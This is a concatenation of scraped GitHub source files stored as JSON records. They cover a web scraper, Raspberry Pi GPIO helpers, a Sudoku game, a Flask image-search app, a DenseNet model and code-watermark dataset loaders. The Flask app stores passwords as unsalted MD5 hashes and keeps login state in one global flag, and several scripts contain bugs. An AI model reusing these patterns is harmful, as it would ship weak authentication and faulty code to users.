]\n","repo_name":"emergence-lab/emergence-lab","sub_path":"afm/migrations/0002_create_processtype.py","file_name":"0002_create_processtype.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23256686905","text":"from typing import List, Union\nfrom requests.compat import urljoin\nfrom bs4 import BeautifulSoup\nfrom Extensions import Extensions\nfrom playwright.sync_api import sync_playwright\n\n\nclass web_playwright(Extensions):\n def __init__(self, **kwargs):\n self.commands = {\n \"Scrape Text with Playwright\": self.scrape_text_with_playwright,\n \"Scrape Links with Playwright\": self.scrape_links_with_playwright,\n }\n\n async def scrape_text_with_playwright(self, url: str) -> str:\n with sync_playwright() as p:\n browser = p.chromium.launch()\n page = browser.new_page()\n\n try:\n page.goto(url)\n html_content = page.content()\n soup = BeautifulSoup(html_content, \"html.parser\")\n\n for script in soup([\"script\", \"style\"]):\n script.extract()\n\n text = soup.get_text()\n lines = (line.strip() for line in text.splitlines())\n chunks = (\n phrase.strip() for line in lines for phrase in line.split(\" \")\n )\n text = \"\\n\".join(chunk for chunk in chunks if chunk)\n\n except Exception as e:\n text = f\"Error: {str(e)}\"\n\n finally:\n browser.close()\n\n return text\n\n async def scrape_links_with_playwright(self, url: str) -> Union[str, List[str]]:\n with sync_playwright() as p:\n browser = p.chromium.launch()\n page = browser.new_page()\n\n try:\n page.goto(url)\n html_content = page.content()\n soup = BeautifulSoup(html_content, \"html.parser\")\n\n for script in soup([\"script\", \"style\"]):\n script.extract()\n\n hyperlinks = [\n (link.text, urljoin(url, link[\"href\"]))\n for link in soup.find_all(\"a\", href=True)\n ]\n formatted_links = [\n f\"{link_text} ({link_url})\" for link_text, link_url in hyperlinks\n ]\n\n except Exception as e:\n formatted_links = f\"Error: {str(e)}\"\n\n finally:\n browser.close()\n\n return formatted_links\n","repo_name":"Loongel/Claude_agent","sub_path":"AGiXT/agixt/extensions/web_playwright.py","file_name":"web_playwright.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35968663823","text":"from gpiozero.pins.pigpio import PiGPIOFactory\nfrom gpiozero import Button, LED\nfrom time import sleep\nimport numpy as np\n\n\n# PI ZERO GPIO MODES MAP(0=input, 1=output, 4=ALT0)\n\n# 0 1 2 3 4 5 6 
7 8 9 10 11 12 13 14 15\n# 4 4 4 4 0 1 1 0 0 0 0 0 0 0 4 4\n\n# 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31\n# 1 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0\n\n\ndef connect_remote_gpio(host_ip):\n \"\"\"Connect to remote GPIO host\n :param host_ip: IP address of your raspberry pi\n :return: factory object\n \"\"\"\n factory = PiGPIOFactory(host=host_ip)\n return factory\n\n\ndef turn_led_on_off(pin, factory, blink, time_on=0.5, time_off=1):\n \"\"\"Turn on and off specific LED\n :param pin: GPIO pin number the LED is connected to\n :param factory: PiGPIOFactory Host\n :param blink: Number of times the led should blink\n :param time_on: Seconds the led should stay\n :param time_off: Seconds the led should stay\n :return: LED Blinking\n \"\"\"\n led = LED(pin, pin_factory=factory)\n\n for i in np.arange(blink):\n led.on()\n print(f\"[INFO] LED at pin {pin} turned on.\")\n sleep(time_on)\n led.off()\n print(f\"[INFO] LED at pin {pin} turned off.\")\n sleep(time_off)\n\n\ndef button_wait_for_press(pin, factory, timeout=None):\n \"\"\"Wait for button to be pressed\n :param pin: GPIO pin number the button is connected to\n :param factory: PiGPIOFactory Host\n :param timeout: Number of seconds to wait before proceeding (None = Wait indefinitely)\n :return: Pause script until button is pressed\n \"\"\"\n button = Button(pin, pin_factory=factory)\n print(f\"[INFO] Waiting for button at pin {pin} to be pressed.\")\n button.wait_for_press(timeout)\n print(f\"[INFO] The button at pin {pin} was pressed.\")\n return True\n\n\ndef button_wait_for_release(pin, factory, timeout=None):\n \"\"\"Wait for button to be released\n :param pin: GPIO pin number the button is connected to\n :param factory: PiGPIOFactory Host\n :param timeout: Number of seconds to wait before proceeding (None = Wait indefinitely)\n :return: Pause script until button is released\n \"\"\"\n button = Button(pin, pin_factory=factory)\n print(f\"Waiting for button at pin {pin} to be released.\")\n button.wait_for_press(timeout)\n print(f\"The button at pin {pin} was released.\")\n return True\n\n\ndef button_when_pressed(pin, factory):\n \"\"\"\n :param pin:\n :param factory:\n :return:\n \"\"\"\n button = Button(pin, pin_factory=factory)\n button.when_pressed()\n print(f\"[INFO] The button at pin {pin} was pressed.\")\n return True\n\n\ndef button_when_released(pin, factory):\n \"\"\"\n :param pin:\n :param factory:\n :return:\n \"\"\"\n button = Button(pin, pin_factory=factory)\n button.when_released()\n print(f\"[INFO] The button at pin {pin} was released.\")\n return True\n","repo_name":"DevGlitch/jaqen","sub_path":"blackbeard/remote_gpio/gpio_func.py","file_name":"gpio_func.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75064161768","text":"import pygame\npygame.init()\n\n\nclass PlayerInteractions:\n\n BLACK = (0, 0, 0)\n RED = (255, 0, 0)\n WHITE = (255, 255, 255)\n LIGHT_GRAY = (179, 179, 179)\n\n FONT_L = pygame.font.SysFont(\"ubuntumono\", 30)\n FONT_S = pygame.font.SysFont(\"ubuntumono\", 20)\n\n keys_set = [pygame.K_KP1, pygame.K_KP2, pygame.K_KP3,\n pygame.K_KP4, pygame.K_KP5, pygame.K_KP6,\n pygame.K_KP7, pygame.K_KP8, pygame.K_KP9]\n\n def movement(self, event, x, y):\n\n number = 0\n if event.key == pygame.K_LEFT:\n if x > 0:\n x -= 1\n if event.key == pygame.K_RIGHT:\n if x < 8:\n x += 1\n if event.key == pygame.K_UP:\n if y > 0:\n y -= 1\n if event.key == pygame.K_DOWN:\n if y < 8:\n y += 1\n # If the player enters a 
number from the numeric keypad.\n if event.key in self.keys_set:\n number = int(event.unicode)\n # Empty the cell if it's filled.\n if event.key == pygame.K_SPACE:\n number = -1\n\n return x, y, number\n\n def display_invalid_input(self, surface, choice):\n sur_x, sur_y = 30, 580\n invalid_input = [\"- Invalid input, the value exists at the same block/ row/ column.\",\n \"- You can't change this value.\"]\n if choice == 1:\n text = self.FONT_S.render(invalid_input[0], True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n elif choice == 2:\n text = self.FONT_S.render(invalid_input[1], True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n\n def display_instructions(self, surface):\n sur_x, sur_y = 30, 600\n instructions = [\"- Use the keyboard arrows to move among the cells.\",\n \"- Press the spacebar ro clear the cell.\",\n \"- Enter a number form you numeric keypad.\"]\n for inst in instructions:\n text = self.FONT_S.render(inst, True, self.BLACK)\n surface.blit(text, (sur_x, sur_y))\n sur_y += 20\n\n def solve_button(self, surface):\n sur_x, sur_y = 600, 270\n\n # pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 110, 60))\n pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 150, 60))\n text = self.FONT_L.render(\"Solve\", True, self.BLACK)\n surface.blit(text, (sur_x+37, sur_y+15))\n\n def clear_button(self, surface):\n sur_x, sur_y = 600, 390\n pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 150, 60))\n text = self.FONT_L.render(\"Clear\", True, self.BLACK)\n surface.blit(text, (sur_x+37, sur_y+15))\n\n def new_game_button(self, surface):\n sur_x, sur_y = 600, 510\n pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 150, 60))\n text = self.FONT_L.render(\"New Game\", True, self.BLACK)\n surface.blit(text, (sur_x + 15, sur_y + 15))\n\n def display_endgame(self, surface, choice):\n congrats = \"Congratulations!!\"\n deadend = \"Dead End!\"\n sur_x, sur_y = 210, 680\n if choice == 1:\n text = self.FONT_L.render(congrats, True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n else:\n text = self.FONT_L.render(deadend, True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n","repo_name":"AmanySalah/Sudoku-Solver","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70388799850","text":"import os\nimport hashlib\nfrom flask import Flask, render_template, request, redirect, flash, url_for\nfrom werkzeug.utils import secure_filename\nfrom time import time\nfrom recherche import *\nfrom mongo import Mongo\n\napp = Flask(__name__)\napp.secret_key = os.getenv('FLASK_KEY')\n\nmongo = Mongo()\n\ncfg = {'descriptors' : {'is_selected' : True, 'XCEPTION_false_rmac' : True},\n 'distance' : {'is_selected' : True, 'vect' : 'euclidean', 'matrix' : 'bruteForceMatching'},\n 'input' : {'is_selected' : False,},\n 'result' : {},\n 'show' : {},\n 'vector' : ['BGR', 'HSV', 'GLCM', 'HOG', 'LBP', 'VGG16_false', 'XCEPTION_false', 'MOBILENET_false', 'XCEPTION_true', 'VGG16_false_pca', 'XCEPTION_false_pca', 'MOBILENET_false_pca', 'XCEPTION_true_pca', 'VGG16_false_rmac', 'XCEPTION_false_rmac', 'MOBILENET_false_rmac', 'XCEPTION_true_rmac'],\n 'matrix' : ['SIFT', 'ORB'],\n 'metrics' : {'classe': {},'subclasse': {}}}\n\n@app.route('/', methods = ['GET', 'POST'])\ndef main():\n\n # if not logged in, redirect to login page\n if not cfg.get('logged_in'):\n return render_template('login.html')\n\n if 
request.method == 'POST' and 'form_desc' in request.form:\n get_descriptor_form()\n if request.method == 'POST' and 'form_dist' in request.form:\n get_distance_form()\n if request.method == 'POST' and 'form_input_image' in request.form:\n get_input_form()\n\n # indexation of the query image and search for best matches\n if request.method == 'POST' and 'form_search' in request.form:\n\n # check if all required fields are selected\n if not (cfg['descriptors']['is_selected'] and cfg['distance']['is_selected'] and cfg['input']['is_selected']):\n flash('[CONFIG] Missing configuration')\n return redirect(request.url)\n\n # get all parameters\n img_path = cfg['input']['img_path']\n descriptors = [k for k, v in cfg['descriptors'].items() if v == True and k != 'is_selected']\n distance_vect = cfg['distance']['vect']\n distance_matrix = cfg['distance']['matrix']\n\n start = time()\n result = recherche(mongo, img_path, descriptors, distance_vect, distance_matrix, cfg) \n cfg['result']['time'] = int(time() - start) # time in seconds\n cfg['result']['names'] = result # list of names of the ordered best matches\n cfg['result']['done'] = True # search is done\n\n # if image query is in the database, analyze metrics\n if cfg['input']['is_in_database']:\n save_metrics(cfg, mongo)\n\n if request.method == 'POST' and 'form_top_20' in request.form:\n cfg['show']['20'] = True\n cfg['show']['50'] = False\n cfg['show']['rp'] = False\n if request.method == 'POST' and 'form_top_50' in request.form:\n cfg['show']['20'] = False\n cfg['show']['50'] = True\n cfg['show']['rp'] = False\n if request.method == 'POST' and 'form_rp' in request.form:\n cfg['show']['20'] = False\n cfg['show']['50'] = False\n cfg['show']['rp'] = True\n\n return render_template('index.html', cfg = cfg)\n\n\n@app.route('/login', methods = ['POST'])\ndef login():\n if request.method == 'POST' and 'form_register' in request.form:\n return render_template('register.html')\n\n if request.method == 'POST' and 'form_login' in request.form:\n user = request.form.get('username')\n pwd = request.form.get('password')\n hash_pwd = hashlib.md5(pwd.encode())\n if mongo.users.find_one({'username': user, 'password': hash_pwd.hexdigest()}):\n cfg['logged_in'] = True\n else:\n flash('[LOGIN] Wrong credentials')\n return redirect(url_for('main'))\n\n@app.route('/register', methods=['POST'])\ndef register():\n if request.method == 'POST' and 'form_register' in request.form:\n user = request.form.get('username')\n pwd = request.form.get('password')\n pwd_again = request.form.get('password_again')\n if pwd != pwd_again:\n flash('Wrong password')\n return render_template('register.html')\n # elif mongo.users.find_one({'username': user}):\n # flash('User already exists')\n # return render_template('register.html')\n else:\n hash_pwd = hashlib.md5(pwd.encode())\n mongo.users.insert_one({'username': user, 'password': hash_pwd.hexdigest()})\n cfg['logged_in'] = True\n return redirect(url_for('main'))\n\n@app.route('/logout')\ndef logout():\n cfg['logged_in'] = False\n return main()\n\n@app.route('/history')\ndef history():\n return render_template('history.html', mongo = mongo)\n\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n\ndef get_descriptor_form():\n cfg['descriptors']['is_selected'] = False\n\n # get status of checkboxes for descriptors\n cfg['descriptors']['SIFT'] = True if request.form.get('SIFT') != None else False\n cfg['descriptors']['BGR'] = True if request.form.get('BGR') != None else False\n cfg['descriptors']['GLCM'] = True if 
request.form.get('GLCM') != None else False\n cfg['descriptors']['HOG'] = True if request.form.get('HOG') != None else False\n cfg['descriptors']['HSV'] = True if request.form.get('HSV') != None else False\n cfg['descriptors']['LBP'] = True if request.form.get('LBP') != None else False\n cfg['descriptors']['ORB'] = True if request.form.get('ORB') != None else False\n \n cfg['descriptors']['VGG16_false'] = True if request.form.get('VGG16_false') != None else False\n cfg['descriptors']['XCEPTION_false'] = True if request.form.get('XCEPTION_false') != None else False\n cfg['descriptors']['XCEPTION_true'] = True if request.form.get('XCEPTION_true') != None else False\n cfg['descriptors']['MOBILENET_false'] = True if request.form.get('MOBILENET_false') != None else False\n \n cfg['descriptors']['VGG16_false_pca'] = True if request.form.get('VGG16_false_pca') != None else False\n cfg['descriptors']['XCEPTION_false_pca'] = True if request.form.get('XCEPTION_false_pca') != None else False\n cfg['descriptors']['XCEPTION_true_pca'] = True if request.form.get('XCEPTION_true_pca') != None else False\n cfg['descriptors']['MOBILENET_false_pca'] = True if request.form.get('MOBILENET_false_pca') != None else False\n \n cfg['descriptors']['VGG16_false_rmac'] = True if request.form.get('VGG16_false_rmac') != None else False\n cfg['descriptors']['XCEPTION_false_rmac'] = True if request.form.get('XCEPTION_false_rmac') != None else False\n cfg['descriptors']['XCEPTION_true_rmac'] = True if request.form.get('XCEPTION_true_rmac') != None else False\n cfg['descriptors']['MOBILENET_false_rmac'] = True if request.form.get('MOBILENET_false_rmac') != None else False\n\n # check if at least one descriptor is selected\n cfg['descriptors']['is_selected'] = any(cfg['descriptors'].values())\n\n # if no descriptor selected, flash error\n if not cfg['descriptors']['is_selected']:\n flash('[CONFIG] No Descriptor selected')\n return redirect(request.url)\n\ndef get_distance_form():\n cfg['distance']['is_selected'] = False\n\n # get selected distance for vector and matrix\n cfg['distance']['vect'] = request.form.get('distance_vect')\n cfg['distance']['matrix'] = request.form.get('distance_matrix')\n\n # check if at least one distance is selected for each category\n cfg['distance']['is_selected'] = False if cfg['distance']['vect'] is None or cfg['distance']['vect'] is None else True\n\n # if distance is not selected, flash error\n if not cfg['distance']['is_selected']:\n if cfg['distance']['vect'] is None:\n flash('[CONFIG] No vector distance selected')\n if cfg['distance']['matrix'] is None:\n flash('[CONFIG] No matrix distance selected')\n return redirect(request.url)\n\ndef get_input_form():\n cfg['input']['is_selected'] = False\n cfg['input']['img_path'] = None\n\n # check if image is uploaded\n if 'file' not in request.files:\n flash('[FILE] No file selected')\n return redirect(request.url)\n\n # parse uploaded file\n file = request.files['file']\n filename = file.filename\n allowed_file = '.' 
in filename and filename.rsplit('.', 1)[1].lower() in ['png', 'jpg', 'jpeg']\n\n # check if file is selected\n if file.filename == '':\n flash('[FILE] No file selected')\n return redirect(request.url)\n\n # check if file is allowed\n elif allowed_file:\n # save file to static/img_loaded\n os.makedirs(os.path.join('static', 'img_loaded'), exist_ok = True)\n file.save(os.path.join('static', 'img_loaded', secure_filename(file.filename)))\n cfg['input']['is_selected'] = True\n path = 'static/img_loaded/' + file.filename\n cfg['input']['img_path'] = path\n cfg['input']['is_in_database'] = True if file.filename in os.listdir('static/db/') else False\n\n\n # if file is not allowed, flash error\n else:\n flash('[FILE] Wrong file format')\n \nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"ValentinCord/Web_Based_Multimedia_Retrieval","sub_path":"webserver/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26891463223","text":"score = int(input(\"Enter score: \"))\n\nif score < 0 or score > 100:\n print(\"Score must be in the range of 0-100\")\n\nelse:\n grading_type = input(\"Is the grading differentiated or non-differentiated (d/n)? \")\n try:\n if grading_type == \"d\":\n if score >= 90:\n print(\"A\")\n elif score >= 80:\n print(\"B\")\n elif score >= 70:\n print(\"C\")\n elif score >= 60:\n print(\"D\")\n elif score >= 50:\n print(\"E\")\n else:\n print(\"F\")\n elif grading_type == \"n\":\n if score >= 50:\n print(\"PASSED\")\n else:\n print(\"FAILED\")\n else:\n print(\"Grading type not recognized\")\n except ValueError:\n print(\"Grading type not recognized\")\n","repo_name":"Nurech/Python_LTAT.03.001","sub_path":"homeworks/02.17/class1.py","file_name":"class1.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27601475264","text":"from c12_concurrency.p11_implement_publish_subscribe_messaging.exchange import get_exchange\n\n\nclass Task:\n def send(self, msg):\n print(self, msg)\n\n\ntask_a = Task()\ntask_b = Task()\n\nexc = get_exchange('name')\nwith exc.subscribe(task_a, task_b):\n exc.send('msg1')\n exc.send('msg2')\nprint()\n\n\nclass DisplayMessages:\n def __init__(self):\n self.count = 0\n\n def send(self, msg):\n self.count += 1\n print('msg[{}]: {!r}'.format(self.count, msg))\n\n\nd = DisplayMessages()\nexc = get_exchange('name')\nwith exc.subscribe(d):\n exc.send('ttt')\n exc.send('aaa')\n","repo_name":"mofei952/cookbook","sub_path":"c12_concurrency/p11_implement_publish_subscribe_messaging/01_publish_subscribe.py","file_name":"01_publish_subscribe.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39537704714","text":"import oneflow as flow\nimport oneflow.nn as nn\nimport oneflow.nn.functional as F\n\n\nclass _DenseLayer(nn.Sequential):\n\n def __init__(self, num_input_features, growth_rate, bn_size, drop_rate):\n super(_DenseLayer, self).__init__()\n self.add_module('norm', nn.BatchNorm3d(num_input_features)),\n self.add_module('elu', nn.ELU(inplace=True)),\n self.add_module('conv', nn.Conv3d(num_input_features, growth_rate,\n kernel_size=3, stride=1, padding=1, bias=False)),\n self.drop_rate = drop_rate\n\n def forward(self, x):\n # Concatenation\n new_features = super(_DenseLayer, self).forward(x)\n if self.drop_rate > 0:\n 
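# drop activations stochastically, but only in training mode (training=self.training)\n            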
new_features = F.dropout(new_features, p=self.drop_rate, training=self.training)\n return flow.cat([x, new_features], 1)\n\n\nclass _DenseBlock(nn.Sequential):\n\n def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate):\n super(_DenseBlock, self).__init__()\n for i in range(num_layers):\n layer = _DenseLayer(num_input_features + i * growth_rate,\n growth_rate=growth_rate,\n bn_size=bn_size,\n drop_rate=drop_rate)\n self.add_module('denselayer%d' % (i + 1), layer)\n\n\nclass Generator(nn.Module):\n\n def __init__(self, ngpu, growth_rate=16, block_config=(4, 4, 4, 4),\n bn_size=2, drop_rate=0):\n\n super(Generator, self).__init__()\n # First convolution\n self.conv0 = nn.Conv3d(1, 2 * growth_rate, kernel_size=3, padding=1, bias=False)\n\n # Each denseblock\n num_features = 2 * growth_rate # 2k\n num_features_cat = num_features\n self.block0 = _DenseBlock(num_layers=block_config[0], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[0] * growth_rate + num_features\n self.comp0 = nn.Conv3d(num_features_cat, num_features,\n kernel_size=1, stride=1, bias=False)\n\n self.block1 = _DenseBlock(num_layers=block_config[1], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[1] * growth_rate + num_features\n self.comp1 = nn.Conv3d(num_features_cat, num_features,\n kernel_size=1, stride=1, bias=False)\n\n self.block2 = _DenseBlock(num_layers=block_config[2], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[2] * growth_rate + num_features\n self.comp2 = nn.Conv3d(num_features_cat, num_features,\n kernel_size=1, stride=1, bias=False)\n\n self.block3 = _DenseBlock(num_layers=block_config[3], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[3] * growth_rate + num_features\n self.recon = nn.Conv3d(num_features_cat, 1,\n kernel_size=1, stride=1, bias=False)\n\n # Official init from flow repo.\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm3d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x):\n x = self.conv0(x)\n out = self.block0(x)\n features = flow.cat([x, out], 1)\n out = self.comp0(features)\n\n out = self.block1(out)\n features = flow.cat([features, out], 1)\n out = self.comp1(features)\n\n out = self.block2(out)\n features = flow.cat([features, out], 1)\n out = self.comp2(features)\n\n out = self.block3(out)\n features = flow.cat([features, out], 1)\n out = self.recon(features)\n return out\n","repo_name":"DsLipku/Oneflow-model","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16509879078","text":"from multiprocessing import Pool \nimport pandas as pd\n\ndef reducer(df):\n dfMunicipio = df.filter(items=[df.columns[1]])\n dfGrouped = dfMunicipio.groupby([dfMunicipio.columns[0]]).size()\n return dfGrouped\n\n\n\ndf = pd.read_csv('../dataset/datos.csv', delimiter=';', encoding='ISO-8859-1')\ndf.head()\n\np = Pool(processes=3)\nprint(\"antes de map\") \nresult = p.map(reducer, df)\nprint(\"ya va a imprimir el 
cosigo\")\nprint(result.to_string())","repo_name":"sortizs/pr4-hpc","sub_path":"concept_test/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13401602798","text":"import os\nimport json\n\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\nfrom .code_vocab import CodeVocab\nfrom .data_instance import (DataInstance, WMDetectionDataInstance,\n DewatermarkingDataInstance)\nfrom .code_dataset import (JsonlCodeWatermarkDataset, JsonlWMDetectionDataset,\n JsonlTaskedCodeWatermarkDataset, JsonlDewatermarkingDataset)\nfrom benchmark_mbxp import compose_function_java, compose_function_javascript\nfrom code_tokenizer import CodeTokenizer\nfrom typing import List, Dict\n\n\nclass JsonlDatasetProcessor:\n def __init__(self, lang: str = 'cpp') -> None:\n self.lang = lang\n # self.code_tokenizer = CodeTokenizer(lang=lang)\n\n def load_jsonl(self, data_dir: str, split: str, show_progress: bool = True) -> List:\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n\n instances = []\n args = []\n for i, obj in enumerate(objs):\n args.append((i, obj, split))\n\n with Pool(os.cpu_count() // 2) as pool:\n result = pool.imap(self._mp_process_instances_wrapper, args)\n\n if show_progress:\n result = tqdm(result, desc=f'{split:10}', total=len(objs))\n\n for res in result:\n instances.append(res)\n\n return instances\n\n def load_raw_jsonl(self, data_dir: str, split: str):\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n return objs\n\n def _mp_process_instances_wrapper(self, args):\n return self._process_instance(*args)\n\n def load_jsonls(self, data_dir: str, show_progress: bool = True) -> Dict[str, List]:\n\n train_instances = self.load_jsonl(data_dir,\n split='train',\n show_progress=show_progress)\n valid_instances = self.load_jsonl(data_dir,\n split='valid',\n show_progress=show_progress)\n test_instances = self.load_jsonl(data_dir,\n split='test',\n show_progress=show_progress)\n\n return {\n 'train': train_instances,\n 'valid': valid_instances,\n 'test': test_instances\n }\n\n def _process_instance(self, id: int, data_obj: Dict, split: str):\n raise NotImplementedError()\n\n def build_dataset(self, instances: List, vocab: CodeVocab):\n raise NotImplementedError()\n\n def build_vocab(self, instances: List) -> CodeVocab:\n raise NotImplementedError()\n\n\nclass JsonlWMDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, lang: str = 'cpp') -> None:\n super().__init__(lang)\n\n def _process_instance(self, id: int, data_obj: Dict, split: str) -> DataInstance:\n source = data_obj['original_string']\n code_tokenizer = CodeTokenizer(lang=self.lang)\n code_tokens, word_tokens = code_tokenizer.get_tokens(source)\n return DataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=code_tokens,\n tokens=word_tokens,\n transform_keys=None)\n\n def build_dataset(self, instances: List[DataInstance],\n vocab: CodeVocab) -> JsonlCodeWatermarkDataset:\n return JsonlCodeWatermarkDataset(instances, vocab)\n\n def build_vocab(self, instances: List[DataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.tokens:\n vocab.add_word(tok)\n\n return vocab\n\n def load_jsonls(self,\n 
data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n def _process_instance_fast(self, id: int, data_obj: Dict, split: str) -> DataInstance:\n source = data_obj['original_string']\n return DataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=None,\n tokens=None,\n transform_keys=None)\n\n def _load_jsonl_fast(self, data_dir: str, split: str, show_progress: bool = True):\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n\n instances = []\n if show_progress:\n objs = tqdm(objs, desc=f'{split:10}')\n\n for i, obj in enumerate(objs):\n instances.append(self._process_instance_fast(i, obj, split))\n\n return instances\n\n def load_jsonls_fast(self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DataInstance]]:\n # only loads source code strings, no tokenization\n # for preprocessing only\n train_instances = self._load_jsonl_fast(data_dir,\n split='train',\n show_progress=show_progress)\n valid_instances = self._load_jsonl_fast(data_dir,\n split='valid',\n show_progress=show_progress)\n test_instances = self._load_jsonl_fast(data_dir,\n split='test',\n show_progress=show_progress)\n\n return {\n 'train': train_instances,\n 'valid': valid_instances,\n 'test': test_instances\n }\n\n\nclass JsonlTaskedWMDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, label_key: str, lang: str = 'cpp') -> None:\n super().__init__(lang)\n self.label_key = label_key\n\n def _process_instance(self, id: int, data_obj: Dict, split: str) -> DataInstance:\n source = data_obj['original_string']\n label = data_obj[self.label_key]\n code_tokenizer = CodeTokenizer(lang=self.lang)\n code_tokens, word_tokens = code_tokenizer.get_tokens(source)\n return DataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=code_tokens,\n tokens=word_tokens,\n task_label=label,\n transform_keys=None)\n\n def build_dataset(self,\n instances: List[DataInstance],\n vocab: CodeVocab,\n label2idx: Dict[str, int],\n is_validation: bool = False) -> JsonlTaskedCodeWatermarkDataset:\n return JsonlTaskedCodeWatermarkDataset(instances, vocab, label2idx, is_validation)\n\n def build_label_dict(self, instances: List[DataInstance]):\n label2idx = dict()\n idx2label = list()\n for instance in instances:\n if instance.task_label not in label2idx:\n label2idx[instance.task_label] = len(idx2label)\n idx2label.append(instance.task_label)\n return label2idx, idx2label\n\n def build_vocab(self, instances: List[DataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.tokens:\n vocab.add_word(tok)\n\n return vocab\n\n def load_jsonls(self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n\nclass JsonlDetectionDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, lang: str = 'cpp') -> None:\n super().__init__(lang)\n\n def load_jsonls(\n self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[WMDetectionDataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n def _process_instance(self, id: int, obj: Dict,\n split: str) -> WMDetectionDataInstance:\n source = obj['after_watermark']\n contains_watermark = obj['contains_watermark']\n code_tokenizer = CodeTokenizer(lang=self.lang)\n _, word_tokens = code_tokenizer.get_tokens(source)\n return 
WMDetectionDataInstance(id=f'{split}#{id}',\n source=source,\n tokens=word_tokens,\n label=contains_watermark)\n\n def build_dataset(self, instances: List, vocab: CodeVocab) -> JsonlWMDetectionDataset:\n return JsonlWMDetectionDataset(instances, vocab)\n\n def build_vocab(self, instances: List[WMDetectionDataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.tokens:\n vocab.add_word(tok)\n\n return vocab\n\n def _process_instance_fast(self, id: int, data_obj: Dict,\n split: str) -> WMDetectionDataInstance:\n source = data_obj['after_watermark']\n contains_watermark = data_obj['contains_watermark']\n tokens = source.strip().split(' ')\n return WMDetectionDataInstance(id=f'{split}#{id}',\n source=source,\n tokens=tokens,\n label=contains_watermark)\n\n def _load_jsonl_fast(self, data_dir: str, split: str, show_progress: bool = True):\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n\n instances = []\n if show_progress:\n objs = tqdm(objs, desc=f'{split:10}')\n\n for i, obj in enumerate(objs):\n instances.append(self._process_instance_fast(i, obj, split))\n\n return instances\n\n def load_jsonls_fast(\n self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[WMDetectionDataInstance]]:\n # only loads source code strings, no tokenization\n # for awt outputs only\n train_instances = self._load_jsonl_fast(data_dir,\n split='train',\n 